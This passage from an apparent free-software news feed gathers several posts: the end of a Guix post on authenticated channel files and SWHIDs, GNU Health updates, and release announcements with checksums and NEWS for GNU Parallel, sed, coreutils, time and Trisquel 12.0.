in a channel specification:(channel (name 'guix-past) (url "https://codeberg.org/guix-science/guix-past") (introduction ;this hex soup 👇 is the channel’s identity (make-channel-introduction "0c119db2ea86a389769f4d2b9c6f5c41c027e336" (openpgp-fingerprint "3CE4 6455 8A84 FDC6 9DB4 0CFB 090B 1199 3D9A EBB5"))))Two channels with the same introduction are one and the same. Thus, if my trusted-channels.scm contains a channel with the above introduction, pull and time-machine will happily pull from it.The corollary is that a channel that cannot be authenticated—i.e., that lacks the introduction field—cannot be considered a trusted channel.Overall, this “trusted channel� rule trades flexibility for safety. It’s a tradeoff but one that looks like a better default than anything that effectively amounts to arbitrary code execution à la curl | sh.The party“Why would I want to download channel files?�, you may ask? Here’s a list of typical use cases we have in mind.The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=masterLikewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:guix time-machine \ -C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science -- shell rstudio -- rstudioA second, similar use case is one-line commands for demos: if you’re developing an application, you can package it, publish a channel file, and share a time-machine command to spawn it. With pinned channels, you can ensure users run it from a known-good state.A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!The fifth use case is reproducible research. A computational workflow can be captured by two files: channels.scm and manifest.scm. In some cases, we might as well download the channel file.Dissonance?But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content�—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.Consider this command:guix time-machine \ -C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002 \ -- …It downloads the channel file identified by the given SWHID and then proceeds.The SWHID serves as an unambiguous and unique content address to refer to a specific channel set. It can be computed using guix hash, but of course, the channel file must first be present in the Software Heritage archive. Thus, if the file is part of a version-control repository, you can first request archiving of that repository. In a research paper, one may include a single command to re-run computations the paper builds upon.PleasurableThis new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing�, channel authentication, and Software Heritage integration.The whole endeavor—allowing for quick deployment without compromising on security—might sound quixotic or, some might say, anachronistic, at a time when the pips, the npms, the snaps and many more are all about deploying software of unknown origin like there’s no tomorrow. In Guix we do believe that transparency, provenance tracking, and verifiability matter for the software we run; efforts like this one are guided by these principles.The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!AcknowledgmentsI am grateful to Caleb “Reepca� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA. Yesterday we had our second session focused on ffs, which I recorded and share publicly with everyone with Prot's permission, so that others can also benefit from Prot's insights and experience as we discuss various aspects of Emacs package development with the concrete example of ffs. Here is the video recording of our session: Sorry, this embedded video will not work, because your web browser does not support HTML5 video. [ please watch the video in your favourite streaming media player ]​ You can view or download the full-resolution video from the Internet Archive. I addressed most of Prot's feedback about ffs from our first session, and I'll be working on the changes we discussed in this session in the next days. In the last third of the video we switched topics to discuss a few Emacs-related tangents including adding a 'padding' effect for the mode line and its constructs, and distilling and separating the easily-reusable package-like parts of one's Emacs configuration from the actual configuration of those parts (e.g. the distinction of prot-lisp and prot-emacs-modules in Prot's Emacs configuration). For mode line padding, here is the snippet I'm using with Prot's doric-themes: (doric-themes-with-colors (custom-set-faces `(mode-line ((t :box (:line-width 6 :color ,bg-shadow-intense)))) `(mode-line-inactive ((t :box (:line-width 6 :color ,bg-shadow-subtle)))) `(mode-line-highlight ((t :box (:color ,bg-shadow-intense)))))) Take care, and so long for now.

Check out the important work our volunteers accomplished this week and at today's Free Software Directory (FSD) IRC meeting.

by Bohdan Potuzhnyi

The initial injustice of proprietary software often leads to further injustices: malicious functionalities. The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice. We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques. Here are our latest additions April 2026 Proprietary Obsolescence Amazon is disconnecting the early models of the Swindle from the Amazon DRM-afflicted book store. Malware in Appliances Some models of Vizio “smart” TVs will have some of their functionalities locked behind a Walmart account login.

GNU Health at the Cyber|Show! Grab a coffee and listen to the 40 min. interview Andy Farnell and Helen Plews made to Luis Falcón in their wonderful show. ❤️ They covered key aspects on citizen and patient data privacy, hospital management, federated health networks, genomics and wearables. In the interview they also talked about the risks associated to commercial, closed sourced electronic health records systems and proprietary mobile applications. The interview reveals how crucial is Free/Libre software for equity and digital sovereignty in our societies. 🩺 🏥 🧬 👇️ https://cybershow ... pisodes.php?id=64 About Cyber|Show: https://cybers ... w.uk/about.php Get this and latest news about GNU Health from our official Mastodon account: https://mastodon. ... social/@gnuhealth Tags: #GNUHealth #GNU #OpenScience #PublicHealth #Privacy #FreeSoftware #SocialMedicine #CyberShow

GNU Parallel 20260422 ('Artemis II') has been released. It is available for download at: lbry://@GnuParallel:4 Quote of the month:   It is a fantastic tool for decades!     -- Ops_Mechanic@reddit New in this release: Remote jobs are spawned via pipe to perl, so environment can be bigger. This is a major rewrite. --pipe-part -a supports -L/-N if zextract is installed. --pipe-part -a supports .gz, .bz2, .zst-files if zextract is installed. Comments in code is redone. Bug fixes and man page updates. GNU Parallel - For people who live life in the parallel lane. If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it. About GNU Parallel GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel. If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops. GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs. For example you can run this to convert all jpeg files into png and gif files and have a progress bar:   parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:   find . -name '*.jpg' |     parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200 You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/ You can install GNU Parallel in just 10 seconds with:     $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \        fetch -o - http://pi.dk/3 ) > install.sh     $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50     12345678 c555f616 391c6f7c 28bf9380 44f4ec50     $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4     70727536 3428aa9e 9a136b9a 7296dfe4     $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259     83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45     b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21     $ bash install.sh Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1 Walk through the tutorial (man parallel_tutorial). Your command line will love you for it. When using programs that use GNU Parallel to process data for publication please cite: O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014. If you like GNU Parallel: Give a demo at your local user group/team/colleagues Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists Get the merchandise https://gnuparall ... igns/gnu-parallel Request or write a review for your favourite blog or magazine Request or build a package for your favourite distribution (if it is not already there) Invite me for your next conference If you use programs that use GNU Parallel for research: Please cite GNU Parallel in you publications (use --citation) If GNU Parallel saves you money: (Have your company) donate to FSF https://my.f ... .org/donate/ About GNU SQL GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries. The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell. When using GNU SQL for a publication please cite: O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32. About GNU Niceload GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

This is to announce sed-4.10, a stable release. It's been more than 3.5 years and quite a few new bug fixes. Special thanks to Paul Eggert, Bruno Haible and Collin Funk for all their help, and especially to Bruno for all the gnulib support and thorough and indefatigable testing and analysis. There have been 92 commits by 9 people in the 180 weeks since 4.9. See the NEWS below for a brief summary. Thanks to everyone who has contributed! The following people contributed changes to this release:   Arkadiusz Drabczyk (2)   Ash Roberts (1)   Brun Haible (1)   Bruno Haible (5)   Collin Funk (5)   Hans Ginzel (1)   Jim Meyering (60)   Paul Eggert (16)   Weixie Cui (1) Jim  [on behalf of the sed maintainers] ================================================================== Here is the GNU sed home page:     https://gnu.org/s/sed/ Here are the compressed sources:   https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz   (2.7MB)   https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz   (1.7MB) Here are the GPG detached signatures:   https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz.sig   https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz.sig Use a mirror for higher download bandwidth:   https://www.gnu.org/order/ftp.html Here are the SHA256 and SHA3-256 checksums:   SHA256 (sed-4.10.tar.gz) = TRef+vkuxNzsVB98Ayvhw7mhhW9JcK25WlBSIXAvUnc=   SHA3-256 (sed-4.10.tar.gz) = ftB7Hf2uN4RnayBEgasV7KmqZqCxBUj7e+Am6WDaiKk=   SHA256 (sed-4.10.tar.xz) = uOchgrLslqNXTimYxHt6qmTMIM4ADY6awxPMB87PKMc=   SHA3-256 (sed-4.10.tar.xz) = bVWJvXR28fvhgP1XTpej6t8V+Bh2YI1lL6aGBy1cG5c= Verify the base64 SHA256 checksum with 'cksum -a sha256 --check' from coreutils-9.2 or OpenBSD's cksum since 2007. Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check' from coreutils-9.8. Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact.  First, be sure to download both the .sig file and the corresponding tarball.  Then, run a command like this:   gpg --verify sed-4.10.tar.gz.sig The signature should match the fingerprint of the following key:   pub   rsa4096/0x7FD9FCCB000BEEEE 2010-06-14 [SCEA]         Key fingerprint = 155D 3FC5 00C8 3448 6D1E  EA67 7FD9 FCCB 000B EEEE   uid                   [ unknown] Jim Meyering <jim@meyering.net>   uid                   [ unknown] Jim Meyering <meyering@fb.com>   uid                   [ unknown] Jim Meyering <meyering@gnu.org> If that command fails because you don't have the required public key, or that public key has expired, try the following commands to retrieve or refresh it, and then rerun the 'gpg --verify' command.   gpg --locate-external-key jim@meyering.net   gpg --recv-keys 7FD9FCCB000BEEEE   wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=sed&download=1' | gpg --import - As a last resort to find the key, you can try the official GNU keyring:   wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg   gpg --keyring gnu-keyring.gpg --verify sed-4.10.tar.gz.sig This release is based on the sed git repository, available as   git clone https://https.git.savannah.gnu.org/git/sed.git with commit 89b7a2224d4faa9d8baf76094b1232ad1477ef3e tagged as v4.10. For a summary of changes and contributors, see:   https://gitweb.git.savannah.gnu.org/gitweb/?p=sed.git;a=shortlog;h=v4.10 or run this command from a git-cloned sed directory:   git shortlog v4.9..v4.10 This release was bootstrapped with the following tools:   Autoconf 2.73.1-b400b   Automake 1.18.1.91   Gnulib 2026-04-19 15211966deb52d4cae425c655177a815a88d3fc0 NEWS * Noteworthy changes in release 4.10 (2026-04-21) [stable] ** Bug fixes   sed 's/a/b/g' (and other global substitutions) now works on input   lines longer than 2GB. Previously, matches beyond the 2^31 byte offset   would evoke a "panic" (exit 4).   [bug present since the beginning]   'sed --follow-symlinks -i' no longer has a TOCTOU race that could let   an attacker swap a symlink between resolution and open, causing sed to   read attacker-chosen content and write it to the original target.   [bug introduced in sed 4.1e]   sed no longer falsely matches when back-references are combined with   optional groups (.?) and the $ anchor.  For example, this no longer   falsely matches the empty string at beginning of line:     $ echo ab | sed -E 's/^(.?)(.?).?\2\1$/X/'     Xab   [bug present since "the beginning"]   In --posix mode, sed no longer mishandles backslash escapes (\n,   \t, \a, etc.) after a named character class like [[:alpha:]].   For example, 's/^A\n[[:alpha:]]\n*/XXX/' would fail to match the   trailing newline, treating \n as a literal backslash and an 'n'   rather than a newline.  This happened when an earlier backslash   escape in the same regex had already been converted, shifting the   in-place normalization buffer.   [bug introduced in sed 4.9]   sed --debug no longer crashes when a label (":") command is compiled   before the --debug option is processed, e.g., sed -f<(...) --debug.   [bug introduced in sed 4.7 with --debug]   sed no longer rejects the documented GNU extension 'a**' (equivalent   to 'a*') in Basic Regular Expression (BRE) mode.  Previously, this   worked only with -E (ERE mode), even though grep has always accepted   it in BRE mode.   [bug present since "the beginning"]   sed no longer rejects "\c[" in regular expressions   [bug present since the beginning]   'sed --follow-symlinks -i' no longer mishandles an operand that is a   short symbolic link to a long symbolic link to a file.   [bug introduced in sed 4.9]   Fix some some longstanding but unlikely integer overflows.   Internally, 'sed' now more often prefers signed integer arithmetic,   which can be checked automatically via 'gcc -fsanitize=undefined'. ** Changes in behavior   In the default C locale, diagnostics now quote 'like this' (with   apostrophes) instead of `like this' (with a grave accent and an   apostrophe).  This tracks the GNU coding standards.   'sed --posix' now warns about uses of backslashes in the 's' command   that are handled by GNU sed but are not portable to other   implementations. ** Build-related   builds no longer fail on platforms without the <getopt.h> header or   getopt_long function.   [bug introduced in sed 4.9]

This is to announce coreutils-9.11, a stable release. Notable changes include:  - cut(1), nl(1), and un/expand(1) are multi-byte character aware  - cut(1) supports new -w, -F, -O options for better compatibility  - cat(1) and yes(1) use zero-copy I/O on Linux (up to 15x faster)  - date(1) now parses dot delimited dd.mm.yy format  - cksum --check uses more defensive file name quoting  - shuf -i operates up to 2x faster by using unlocked stdio  - wc -l operates up to 4.5x faster on hosts with neon instructions  - wc -m is up to 2.6x faster when processing multi-byte characters There have also been many bug fixes and other changes as summarized in the NEWS below. There have been 306 commits by 12 people in the 10 weeks since 9.10 Thanks to everyone who has contributed!   Bruno Haible (2)                Paul Eggert (15)   Chris Down (2)                  Pádraig Brady (156)   Collin Funk (91)                Sam James (1)   Dr. David Alan Gilbert (1)      Sylvestre Ledru (17)   Gabriel (1)                     Weixie Cui (2)   Lukáš Zaoral (2)                oech3 (19) Pádraig [on behalf of the coreutils maintainers] ================================================================== Here is the GNU coreutils home page:     https://gnu.org/s/coreutils/ Here are the compressed sources:   https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz   (16MB)   https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz   (6.3MB) Here are the GPG detached signatures:   https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz.sig   https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz.sig Use a mirror for higher download bandwidth:   https://www.gnu.org/order/ftp.html Here are the SHA256 and SHA3-256 checksums:   SHA256 (coreutils-9.11.tar.gz) = IDO4owScBr/0mp486nK99Gg7zQy+uXUhHdVtuvi3Nq4=   SHA3-256 (coreutils-9.11.tar.gz) = TwFrSgPuppf+jNggT+aXj037UfVVS2BmYBxXiPLYKxs=   SHA256 (coreutils-9.11.tar.xz) = OUAk7aCllVIXztqc0SAeZdyPo6opwpURNaSVIdV8PMM=   SHA3-256 (coreutils-9.11.tar.xz) = RkpNMip8O4ly+z3Fef9X20AsotbT1ycBZ5UbG84SiNM= Verify the base64 SHA256 checksum with 'cksum -a sha256 --check' from coreutils-9.2 or OpenBSD's cksum since 2007. Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check' from coreutils-9.8. Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact.  First, be sure to download both the .sig file and the corresponding tarball.  Then, run a command like this:   gpg --verify coreutils-9.11.tar.gz.sig The signature should match the fingerprint of the following key:   pub   rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]         Key fingerprint = 6C37 DC12 121A 5006 BC1D  B804 DF6F D971 3060 37D9   uid                   [ultimate] Pádraig Brady <P@draigBrady.com>   uid                   [ultimate] Pádraig Brady <pixelbeat@gnu.org> If that command fails because you don't have the required public key, or that public key has expired, try the following commands to retrieve or refresh it, and then rerun the 'gpg --verify' command.   gpg --locate-external-key P@draigBrady.com   gpg --recv-keys DF6FD971306037D9   wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import - As a last resort to find the key, you can try the official GNU keyring:   wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg   gpg --keyring gnu-keyring.gpg --verify coreutils-9.11.tar.gz.sig This release is based on the coreutils git repository, available as   git clone https://https.git.savannah.gnu.org/git/coreutils.git with commit c01fd163a47468a8296fb369f5233853bb551bb6 tagged as v9.11. For a summary of changes and contributors, see:   https://gitweb.git.savannah.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.11 or run this command from a git-cloned coreutils directory:   git shortlog v9.10..v9.11 This release was bootstrapped with the following tools:   Autoconf 2.73.1-b400b   Automake 1.18.1   Gnulib 2026-04-19 fb7312fa8d3df29f0ca0678f669b9a5b88a078ec   Bison 3.8.2 NEWS * Noteworthy changes in release 9.11 (2026-04-20) [stable] ** Bug fixes   'dd' now always diagnoses partial writes correctly upon write failure.   Previously it may have indicated that only full writes were performed.   [This bug was present in "the beginning".]   'fold' will no longer truncate output when encountering 0xFF bytes.   [bug introduced in coreutils-9.8]   'fold' is again responsive to its input.  Previously it would have delayed   processing until 256KiB was read from the input.   [bug introduced in coreutils-9.8]   'kill --help' now has links to valid anchors in the html manual.   [bug introduced in coreutils-9.10]   When configured with --enable-systemd, the commands 'pinky',   'uptime', 'users', and 'who' no longer consider the systemd session   classes 'greeter', 'lock-screen', 'background', 'background-light',   and 'none' to be users.   [bug introduced in coreutils-9.4]   'pwd' on ancient systems will no longer overflow a buffer   when operating in deep paths longer than twice the system PATH_MAX.   [bug introduced in coreutils-9.6]   'stat --printf=%%N' no longer performs unnecessary checks of the QUOTING_STYLE   environment variable.   [bug introduced in coreutils-8.26]   'timeout' no longer exits abruptly when its parent is the init process, e.g.,   when started by the entrypoint of a container.   [bug introduced in coreutils-9.10] ** New Features   'cut' now supports multi-byte input and delimiters.  Consequently   the -c option is now honored, and no longer an alias for -b, and   the -n option is now honored, and no longer ignored.   Also the -d option supports multi-byte delimiters.   'cut' adds new options for better compatibility:   The -w,--whitespace-delimited option was added to support blank aligned fields   and for better compatibility with FreeBSD/macOS.   The -O option was added as an alias for the --output-delimiter option,   for better compatibility with busybox/toybox.   The -F option was added as an alias for -w -O ' '   for better compatibility with busybox/toybox.   'date --date' now parses dot delimited dd.mm.yy format common in Europe.   This is in addition to the already supported mm/dd/yy and yy-mm-dd formats. ** Changes in behavior   'cksum --check' now uses shell quoting when required, to more robustly   escape file names output in diagnostics.   This also affects md5sum, sha*sum, and b2sum. ** Improvements   'cat' now uses zero-copy I/O on Linux when appropriate, to improve throughput.   E.g., throughput improved 6x from 12.9GiB/s to 81.8GiB/s on a Power10 system.   'df --local' recognises more file system types as remote.   Specifically: autofs, ncpfs, smb, smb2, gfs, gfs2, userlandfs.   'df' improves duplicate mount suppression, by checking each mount against   all previously kept entries for the same device, not just the latest one.   'expand' and 'unexpand' now support multi-byte characters.   'groups' and 'id' will now exit sooner after a write error,   which is significant when listing information for many users.   'install' now allows the combination of the --compare and   --preserve-timestamps options.   'fold', 'join', 'numfmt', 'uniq' now use more consistent blank character   determination on non GLIBC platforms.  For example \u3000 (ideographic space)   will be considered a blank character on all platforms.   'nl' now supports multi-byte --section-delimiter characters.   'shuf -i' now operates up to two times faster on systems with unlocked stdio   functions.   'tac' will now exit sooner after a write error, which is significant when   operating on a file with many lines.   'timeout' now properly detects when it is reparented by a subreaper process on   Linux instead of init, e.g., the 'systemd --user' process.   'wc -l' now operates up to four and a half times faster on hosts that support   Neon instructions.   'wc -m' now operates up to 2.6 times faster on GLIBC when processing   non-ASCII UTF-8 characters.   'yes' now uses zero-copy I/O on Linux to significantly increase throughput.   E.g., throughput improved 15x from 11.6GiB/s to 175GiB/s on a Power10 system. ** Build-related   ./configure --enable-single-binary=hardlinks is now supported on systems   with dash as the system shell at /bin/sh.   [issue introduced in coreutils-9.10]   The test suite may have failed with a "Hangup" error if run non-interactively.   [issue introduced in coreutils-9.10]

Dear community The GTK client 5.0.2 of the GNU Health Hospital and Health Management system has been released! This is a maintenance patchset that fixes the following issues: Unknown icon error when registering gnu health local icons Swapped Export - import icons Update connection port number in README file GNU Health GTK client does not automatically discover plugins from gnuhealth_plugins You can get the latest GNU Health client from GNU.org, Python Package Index or Codeberg. Happy hacking!

by Özgür Kesim

Dear GNU Health community We are happy to announce the release of Thalamus 0.9.18. Thalamus is the message and authentication server of the GNU Health Federation. In this release, we have migrated to Poetry packaging system and updated the documentation (https://docs.gnuh ... alth.org/thalamus) You can get Thalamus from GNU.org and the Python Package Index, PyPi Happy hacking! Luis

This is to announce time-1.10, a stable release. The 'time' command runs another program, then displays information about the resources used by that program. There have been 79 commits by 5 people in the 422 weeks since 1.9. See the NEWS below for a brief summary. Thanks to everyone who has contributed! The following people contributed changes to this release:   Andreas Schwab (1)   Assaf Gordon (10)   Collin Funk (65)   Dominique Martinet (1)   Petr Písař (2) Collin  [on behalf of the time maintainers] ================================================================== Here is the GNU time home page:     https://gnu.org/s/time/ Here are the compressed sources:   https://ftp.gnu.org/gnu/time/time-1.10.tar.gz   (832KB)   https://ftp.gnu.org/gnu/time/time-1.10.tar.xz   (572KB) Here are the GPG detached signatures:   https://ftp.gnu.org/gnu/time/time-1.10.tar.gz.sig   https://ftp.gnu.org/gnu/time/time-1.10.tar.xz.sig Use a mirror for higher download bandwidth:   https://www.gnu.org/order/ftp.html Here are the SHA256 and SHA3-256 checksums:   SHA256 (time-1.10.tar.gz) = 6MKftKtZnYR45B6GGPUNuK7enJCvJ9DS7yiuUNXeCcM=   SHA3-256 (time-1.10.tar.gz) = zDjyfyzfABsSZp7lwXeYr368VzjZMkNPUJNnfpIakGk=   SHA256 (time-1.10.tar.xz) = cGv3uERMqeuQN+ntoY4dDrfCMnrn2MLOOkgjxfgMexE=   SHA3-256 (time-1.10.tar.xz) = U/Z0kMenoHkc7+rkCHMeyku8nXvIPppoQ2jq3B50e/A= Verify the base64 SHA256 checksum with 'cksum -a sha256 --check' from coreutils-9.2 or OpenBSD's cksum since 2007. Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check' from coreutils-9.8. Use a .sig file to verify that the corresponding file (without the .sig suffix) is intact.  First, be sure to download both the .sig file and the corresponding tarball.  Then, run a command like this:   gpg --verify time-1.10.tar.gz.sig The signature should match the fingerprint of the following key:   pub   rsa4096/8CE6491AE30D7D75 2024-03-11 [SC]         Key fingerprint = 2371 1855 08D1 317B D578  E5CC 8CE6 491A E30D 7D75   uid                 [ultimate] Collin Funk <collin.funk1@gmail.com> If that command fails because you don't have the required public key, or that public key has expired, try the following commands to retrieve or refresh it, and then rerun the 'gpg --verify' command.   gpg --locate-external-key collin.funk1@gmail.com   gpg --recv-keys 8CE6491AE30D7D75   wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=time&download=1' | gpg --import - As a last resort to find the key, you can try the official GNU keyring:   wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg   gpg --keyring gnu-keyring.gpg --verify time-1.10.tar.gz.sig This release is based on the time git repository, available as   git clone https://https.git.savannah.gnu.org/git/time.git with commit 40003f3c8c4ad129fbc9ea0751c651509ac5bb23 tagged as v1.10. For a summary of changes and contributors, see:   https://gitweb.git.savannah.gnu.org/gitweb/?p=time.git;a=shortlog;h=v1.10 or run this command from a git-cloned time directory:   git shortlog v1.9..v1.10 This release was bootstrapped with the following tools:   Autoconf 2.73   Automake 1.18.1   Gnulib 2026-04-13 c754c51f0f2b9a1e22d0d3eadfefff241de0ea48 NEWS * Noteworthy changes in release 1.10 (2026-04-14) [stable] ** Bug fixes   'time --help' no longer incorrectly lists the short option -h as being   supported.  Previously it was listed as being equivalent to --help.   [bug introduced in time-1.8]   'time --help' no longer emits duplicate percent signs in the description of   the --portability option.   [bug introduced in time-1.8]   time now opens the file specified by --output with its close-on-exec flag set.   Previously the file descriptor would be leaked into the child process.   [This bug was present in "the beginning".]   time no longer appends the program name to the output when the format string   contains a trailing backslash.   [This bug was present in "the beginning".] ** Improvements   time now uses the more portable waitpid and getrusage system calls   instead of wait3.   time can now be built using a C23 compiler.   time now uses unlocked stdio functions on platforms that provide them.

Dear community I'm happy to announce the release of the patchset v5.0.7 of the GNU Health Information Management System. This maintenance version fixes issues in the crypto subsystem related to the laboratory results validation process; delivers automated testing for the packages and updates pyproject.toml to the latest PEP639 specs. Main issues fixed & tasks related to this patchset: health_crypto_lab: Wrong display of the validation button and 403 error  (https://codeberg. ... th/his/issues/177) Update woodpecker CI and packages automated tests (thanks, Cedric!). (https://codeberg. ... 5c11eda152df82dbf) Update pyproject.toml to PEP639 project.license current specification (https://codeberg. ... th/his/issues/178) For more details visit our development area at Codeberg. Happy hacking! Luis

We are proud to announce the release of Trisquel 12.0 Ecne! After extensive work and thorough testing, Ecne is ready for production use. This release builds on the foundation of Aramo with meaningful improvements across packaging, the kernel, security, and software availability. Major milestones APT 3.0 and full deb822 repository format. Trisquel 12.0 ships with APT 3.0, enabling us to fully adopt the modern deb822 repository format across all installation paths. The netinstall (for text-based installation and advanced users), Ubiquity (for graphical installation from a live system), as well as Synaptic and other package-management tools have been updated to use the new repository formats. Improved kernel modularity, and system security. The kernel remains one of our biggest engineering challenges with every release. For Ecne, we focused on making our kernel changes more modular, substantially reducing breakage in the udeb components used during installation. Work on updating kernel-wedge is ongoing and we are well positioned to complete it. We revised many AppArmor rules for graphical environments, improving security coverage for everyday desktop use. New browser options. Both GNU IceCat and ungoogled-chromium are now available in Ecne, joining our continuously maintained Abrowser, giving users a range of fully free web browsing choices. Backports. Our backports repository continues to provide popular applications in their latest versions, including LibreOffice, yt-dlp, Inkscape, Nextcloud Desktop, Kdenlive, Tuba, 0 A.D., fastfetch, and more. Ecne is based on Ubuntu 24.04 LTS and will receive support until 2029. Users of Trisquel 11.x Aramo can upgrade directly using the update-manager or do-release-upgrade commands at a console terminal. Editions Trisquel. MATE (v1.26.1) continues to be our default desktop environment. Simple, with great accessibility, and low hardware requirements (no 3D acceleration needed). Triskel. Our KDE (v5.27) edition is excellent for customizing the design and functionality in fine detail. Trisquel Mini. Running LXDE (v0.99.2), the Mini edition is a lightweight desktop perfect for netbooks, old computers and users with minimal resource usage needs. Trisquel Sugar or Trisquel On A Sugar Toast (TOAST): Based on the Sugar learning platform (v0.121), TOAST comes with dozens of educational activities for children. Network installer image: To deploy with a command-line install interface, it is ideal for servers and advanced users who want to explore custom designed environments. Looking ahead Work on the next release will start immediately, and initial groundwork for RISC-V architecture support has already begun; an exciting new challenge as the free hardware design ecosystem continues to grow. Trisquel is a non-profit project; you can help sustain it by becoming a member, donating, or buying from our store. Thank you to all our donors, and to the contributors who made Ecne possible through code, patches, bug reports, translations, and advice. Special thanks to Luis "Ark74" Guzmán, prospero, icarolongo, Avron, knife, Simon Josefsson, Christopher Waid (ThinkPenguin), Denis "GNUtoo" Carikli, and the wonderful community that keeps the project alive and free.

